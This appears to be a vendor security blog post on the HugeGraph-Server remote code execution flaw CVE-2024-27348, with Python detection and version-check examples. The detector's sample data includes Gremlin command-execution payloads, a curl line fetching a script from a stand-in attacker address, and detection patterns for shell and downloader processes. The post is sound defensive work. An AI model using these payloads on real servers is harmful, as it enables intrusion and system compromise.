
CVE-2024-27348 is a critical remote code execution (RCE) vulnerability in Apache HugeGraph-Server. HugeGraph is a graph database compatible with the Apache TinkerPop 3 framework and the Gremlin query language, and it was the first graph database project at the Apache Software Foundation.

The flaw lets an unauthenticated attacker execute arbitrary OS commands on the server, which can lead to unauthorized access, data manipulation, and full system compromise.


Affected Versions

The vulnerability affects Apache HugeGraph-Server versions 1.0.0 up to, but not including, 1.3.0, running on Java 8 or Java 11. The fix shipped in 1.3.0; the Apache advisory also recommends running on Java 11 and enabling HugeGraph's authentication (Auth) system.


Vulnerability Description

The root cause of CVE-2024-27348 is insufficient restriction of user-supplied Gremlin scripts. HugeGraph-Server executes Gremlin-Groovy scripts through TinkerPop's GremlinGroovyScriptEngine, and a specially crafted script can reach the Java classes that run OS commands.


Gremlin Script Execution

The Gremlin script execution process involves the following steps:

  • Script Compilation: The script is compiled by GremlinGroovyClassLoader, which applies the engine's customizations through a CompilerConfiguration.
  • Script Caching: The isCached method checks whether the script has already been compiled; if not, it is compiled and stored for reuse.
  • Binding Retrieval: Bindings are read from the ScriptContext to build the execution context in which the script runs.
  • Function Invocation: The invokeFunction method calls the requested method, falling back to global functions if the method is not found.
  • SecurityManager Checks: The HugeSecurityManager class is meant to enforce restrictions by overriding java.lang.SecurityManager methods such as checkPermission, checkExec, and checkRead. In vulnerable versions these checks can be bypassed under specific conditions, which is what the vulnerability exploits.


Exploitation Path

An attacker can craft a Gremlin query that uses the java.lang.Runtime class to execute system commands.

For instance:

[Screenshot in the original post: an example Gremlin query invoking Runtime]

Such a query should be rejected with a SecurityException by the restrictions HugeSecurityManager imposes. In vulnerable versions, however, those checks can be bypassed and the command runs with the privileges of the HugeGraph-Server process.

The Shadowserver Foundation has reported observing in-the-wild exploitation attempts against this vulnerability.

Fig. 1 - In-the-wild exploitation reported by Shadowserver


Exploitation Detection using Uptycs XDR

In our lab we exploited the vulnerability to drop and run a coin miner and other malware; Uptycs XDR detected the resulting activity.

Fig. 2 - Detection of malicious activity (detect-only mode) by Uptycs XDR

When blocking mode is enabled, Uptycs XDR blocks every execution attempt at the exploitation stage, as seen below.

Fig. 3 - Uptycs XDR killing the exploitation activity (block mode)
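The two signals behind this kind of detection are the request itself (a Gremlin-Groovy script that references the JVM's command-execution classes) and the host-side effect (the HugeGraph JVM spawning a shell or downloader). The following Python is an added example, not Uptycs' or Apache HugeGraph's code, that runs both checks over constructed sample data. It assumes the HugeGraph Gremlin API shapes `POST /gremlin` with a JSON body containing a `gremlin` field and `GET /gremlin?gremlin=...`; the request records, process events, IP addresses and the HugeGraph command line are all made up for the example.

```python
"""Added example (not Uptycs' or Apache HugeGraph's code): two detection
signals for CVE-2024-27348 exploitation, run over constructed sample data.

Signal 1 - request inspection: a Gremlin-Groovy script submitted to the
  HugeGraph Gremlin API that references the JVM's command-execution classes.
Signal 2 - process ancestry: the HugeGraph JVM spawning a shell or a
  downloader, which is what a successful command execution looks like on the host.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Tokens a legitimate graph traversal never needs. Word boundaries keep a
# property named "executed" or "runtime_ms" from firing.
SUSPICIOUS_SCRIPT_PATTERNS = {
    "java.lang.Runtime": re.compile(r"\bRuntime\b"),
    "Runtime.getRuntime()": re.compile(r"\bgetRuntime\s*\("),
    "exec() call": re.compile(r"\.exec\s*\("),
    "java.lang.ProcessBuilder": re.compile(r"\bProcessBuilder\b"),
}

# Children of the server JVM that indicate post-exploitation activity.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "python3", "perl"}


def extract_script(record):
    """Pull the Gremlin script out of a HugeGraph Gremlin API request.

    Assumed request shapes (HugeGraph REST API):
      POST /gremlin  with JSON body {"gremlin": "...", "language": "gremlin-groovy", ...}
      GET  /gremlin?gremlin=<url-encoded script>
    """
    parts = urlsplit(record["path"])
    if parts.path != "/gremlin":
        return ""
    if record["method"] == "POST":
        try:
            return json.loads(record["body"]).get("gremlin", "")
        except (json.JSONDecodeError, AttributeError):
            return record["body"]  # malformed JSON: inspect the raw body instead
    if record["method"] == "GET":
        return parse_qs(parts.query).get("gremlin", [""])[0]
    return ""


def scan_gremlin_request(record):
    """Return the names of the suspicious patterns found in the request's script."""
    script = extract_script(record)
    return [name for name, rx in SUSPICIOUS_SCRIPT_PATTERNS.items() if rx.search(script)]


def scan_process_event(event):
    """True when the HugeGraph server JVM spawned a shell or downloader."""
    parent_is_hugegraph = (event["parent_comm"] == "java"
                           and "hugegraph" in event["parent_cmdline"].lower())
    return parent_is_hugegraph and event["comm"] in SUSPICIOUS_CHILDREN


def detect(requests, events):
    """Run both signals and return the findings, requests first."""
    findings = []
    for rec in requests:
        hits = scan_gremlin_request(rec)
        if hits:
            findings.append({"kind": "gremlin_request", "src": rec["src"], "matched": hits})
    for ev in events:
        if scan_process_event(ev):
            findings.append({"kind": "process_spawn", "pid": ev["pid"], "cmdline": ev["cmdline"]})
    return findings


# Constructed sample data, not real captures.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "method": "POST", "path": "/gremlin",
     "body": json.dumps({"gremlin": "g.V().hasLabel('person').limit(5)", "language": "gremlin-groovy"})},
    {"src": "10.0.0.5", "method": "POST", "path": "/gremlin",
     "body": json.dumps({"gremlin": "g.V().has('name','alice').out('knows').values('name')",
                         "language": "gremlin-groovy"})},
    {"src": "198.51.100.23", "method": "POST", "path": "/gremlin",
     "body": json.dumps({"gremlin": "Runtime.getRuntime().exec('id')", "language": "gremlin-groovy"})},
    {"src": "198.51.100.23", "method": "GET",
     "path": "/gremlin?gremlin=new%20ProcessBuilder(%22whoami%22).start()", "body": ""},
    {"src": "10.0.0.9", "method": "GET", "path": "/graphs/hugegraph/schema/vertexlabels", "body": ""},
]

HUGEGRAPH_CMDLINE = "java -cp /opt/hugegraph/lib/* org.apache.hugegraph.dist.HugeGraphServer"  # constructed
SAMPLE_PROCESS_EVENTS = [
    {"pid": 1311, "comm": "sh", "cmdline": "sh -c id",
     "parent_comm": "java", "parent_cmdline": HUGEGRAPH_CMDLINE},
    {"pid": 1320, "comm": "curl", "cmdline": "curl -s http://198.51.100.23/x.sh",
     "parent_comm": "java", "parent_cmdline": HUGEGRAPH_CMDLINE},
    {"pid": 1400, "comm": "curl", "cmdline": "curl -s https://example.org/health",
     "parent_comm": "bash", "parent_cmdline": "bash"},          # admin shell, benign
    {"pid": 1410, "comm": "java", "cmdline": "java -jar tool.jar",
     "parent_comm": "java", "parent_cmdline": HUGEGRAPH_CMDLINE},  # not a shell, ignored
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_REQUESTS, SAMPLE_PROCESS_EVENTS):
        print(json.dumps(finding))
```

The request check is deliberately narrow (Runtime and ProcessBuilder only) so it stays low-noise; in practice you would tune the pattern list to what your own workloads never use and pair it with the process-ancestry signal, which catches the command execution regardless of how the script reached it.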


Vulnerability Detection using Uptycs XDR

Uptycs XDR detects vulnerable instances of Apache HugeGraph-Server running on a host or in a container.

Fig. 4 - Vulnerability detection by Uptycs XDR
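Without an agent, the same determination comes down to reading the server's version and placing it against the affected range. The following Python is an added example, not Uptycs' or Apache HugeGraph's code. It assumes the HugeGraph REST endpoint `GET /versions` returns JSON of the form `{"versions": {"version": "v1", "core": "1.2.0", "gremlin": "...", "api": "..."}}` with `core` carrying the server version; the sample responses are constructed, and the host names are made up.

```python
"""Added example (not Uptycs' or Apache HugeGraph's code): classify a
HugeGraph-Server instance against the CVE-2024-27348 affected range
(1.0.0 <= version < 1.3.0) from its GET /versions response.

Assumed response shape (HugeGraph REST API):
    {"versions": {"version": "v1", "core": "1.2.0", "gremlin": "3.5.1", "api": "0.69.0"}}
The sample responses below are constructed, not captured from real servers.
"""
import json
import re

AFFECTED_MIN = (1, 0, 0)   # first affected release (inclusive)
FIXED_IN = (1, 3, 0)       # release that fixes the issue (exclusive upper bound)

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """'1.2.0', 'v1.2.0' and '1.2.0-SNAPSHOT' all parse to (1, 2, 0)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version_text):
    """True when the version falls inside the advisory's affected range."""
    return AFFECTED_MIN <= parse_version(version_text) < FIXED_IN


def assess(versions_response):
    """Return a status for one server from the raw JSON of GET /versions.

    Versions below 1.0.0 are pre-Apache releases that the advisory's range
    does not cover; they are reported separately rather than marked safe.
    The JVM version is deliberately not used to clear a host: the advisory
    names Java 8 and Java 11 as affected runtimes, but the fix is the upgrade
    to 1.3.0 either way.
    """
    core = json.loads(versions_response)["versions"]["core"]
    v = parse_version(core)
    if v < AFFECTED_MIN:
        status, action = "below_range", "older than the advisory's range; unsupported, upgrade to 1.3.0 or later"
    elif v < FIXED_IN:
        status, action = "affected", "upgrade to 1.3.0 or later"
    else:
        status, action = "fixed", "no action for CVE-2024-27348"
    return {"core_version": core, "status": status, "action": action}


def assess_fleet(responses):
    """Map of host name -> assessment, for a dict of host name -> /versions body."""
    return {name: assess(body) for name, body in responses.items()}


# Constructed sample /versions responses, one per (made-up) host.
SAMPLE_RESPONSES = {
    "graph-a": '{"versions": {"version": "v1", "core": "1.2.0", "gremlin": "3.5.1", "api": "0.69.0"}}',
    "graph-b": '{"versions": {"version": "v1", "core": "1.3.0", "gremlin": "3.5.1", "api": "0.71.0"}}',
    "graph-c": '{"versions": {"version": "v1", "core": "0.12.0", "gremlin": "3.4.3", "api": "0.68.0"}}',
}

if __name__ == "__main__":
    for host, result in assess_fleet(SAMPLE_RESPONSES).items():
        print(f"{host}: {result['core_version']} -> {result['status']} ({result['action']})")
```

Feeding this the live `/versions` output of each server in an inventory gives a quick fleet-wide answer; the `below_range` bucket exists so that old pre-1.0 deployments are not silently reported as clean.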


Conclusion

Apache HugeGraph is widely used across industries such as finance and healthcare. The disclosure of CVE-2024-27348 and its active exploitation make it urgent for users to upgrade to HugeGraph-Server 1.3.0 or later promptly, and they underline the need for robust security practices and proactive monitoring to stay protected from such threats.